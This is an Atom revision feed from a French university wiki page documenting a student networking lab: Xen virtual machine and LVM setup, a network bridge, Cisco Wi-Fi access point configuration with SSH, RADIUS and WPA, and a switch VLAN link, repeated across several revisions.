 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56332</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56332"/>
				<updated>2021-11-12T09:01:33Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56022</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56022"/>
				<updated>2021-09-30T11:19:15Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56021</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56021"/>
				<updated>2021-09-30T11:19:01Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56019</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56019"/>
				<updated>2021-09-30T11:16:33Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Configuration du point d'accés wifi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle : ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Véiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
